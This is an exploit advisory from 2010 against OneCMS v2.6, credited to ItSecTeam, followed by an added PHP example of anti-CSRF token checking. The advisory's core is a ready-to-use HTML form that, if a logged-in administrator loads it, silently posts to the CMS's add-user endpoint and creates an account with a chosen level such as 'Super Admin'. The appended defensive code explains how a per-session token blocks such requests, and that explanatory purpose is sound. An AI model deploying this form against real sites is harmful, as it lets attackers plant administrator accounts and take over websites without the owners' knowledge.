
onecms-xsrf.txt

Posted on 30 March 2010

( #Topic : OneCMS_v2.6 2010-03-25
( #Bug type : remote add admin user exploit
( #Download : http://sourceforge.net/projects/onecms/files/onecms/v2.6/OneCMS_v2.6.zip/download
===========================================================================
( #Author : ItSecTeam
( #Email : Bug@ITSecTeam.com
( #Website: http://www.itsecteam.com
( #Forum : http://forum.ITSecTeam.com
( #Original Advisory : www.ITSecTeam.com/en/vulnerabilities/vulnerability29.htm
( #coded by ahmadbady
( #Special Tnx : PLATEN , 0xd41684c654 , b3hz4d , Pejvak , Cdef3nder , mijax , r3dm0v3 , M3hr@n.S And All Team Members!
---------------------------------------------------------------------
exploit:

<html>
<head>
<body>
<form action='users.php?load=users&view=add2' method='post'>
<table cellspacing="0" cellpadding="3" border="0" align="left">
<tr><td>Username</td><td><input type="text" name='name'></td></tr>
<tr><td>Password</td><td><input type="password" name='password1'></td>
</tr><tr><td>E-Mail</td><td><input type="text" name='email'></td></tr><tr>
<td>User Level</td><td><select name='level' multiple size='5'>
<option value="Super Admin">Super Admin</option>
<option value="Member">Member</option>
<option value="Super Staff">Super Staff</option>
<option value="Staff">Staff</option>
<input type="submit" name="Add" value="Add User"></td></tr></form></table></td>
</tr></table><tr><td width="100%" height="9"></td><tr><tr><td/>
</body>
</html>
---------------------------------------------------------------------
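
The form above posts name, password1, email and level to users.php?load=users&view=add2 and carries no per-session token. As an added example (not OneCMS code and not part of the advisory), this is one way a handler for such a request can reject a cross-site POST with a per-session anti-CSRF token; the function names and the csrf_token field are assumptions.

```php
<?php
// Added example, not OneCMS code. Function names and the csrf_token
// field are assumptions; session and request data are passed in as arrays
// so the script runs from the CLI (use $_SESSION / $_POST in a real page).

// Create (once per session) the secret that the add-user form must echo back.
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Constant-time comparison; a missing or non-string token fails closed.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($supplied)
        && hash_equals($expected, $supplied);
}

// Returns the HTTP status the add-user handler should send.
function handle_add_user(string $method, array $session, array $post): int
{
    if ($method !== 'POST') {
        return 405;
    }
    if (!csrf_valid($session, $post)) {
        return 403; // a page on another origin cannot read the session token
    }
    $levels = ['Super Admin', 'Member', 'Super Staff', 'Staff'];
    if (!in_array($post['level'] ?? '', $levels, true)) {
        return 400;
    }
    // The CMS's own user-creation code would run here.
    return 200;
}

// Constructed requests using the field names of the form in the advisory.
$session = [];
$token   = csrf_issue($session);
$fields  = ['name' => 'alice', 'password1' => 'constructed-value',
            'email' => 'alice@example.test', 'level' => 'Member'];

echo handle_add_user('POST', $session, $fields), "\n";
echo handle_add_user('POST', $session, $fields + ['csrf_token' => $token]), "\n";
```

The first call models the advisory's form submitted without a token and is refused; the second includes the token that the legitimate admin page would embed as a hidden field.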

 
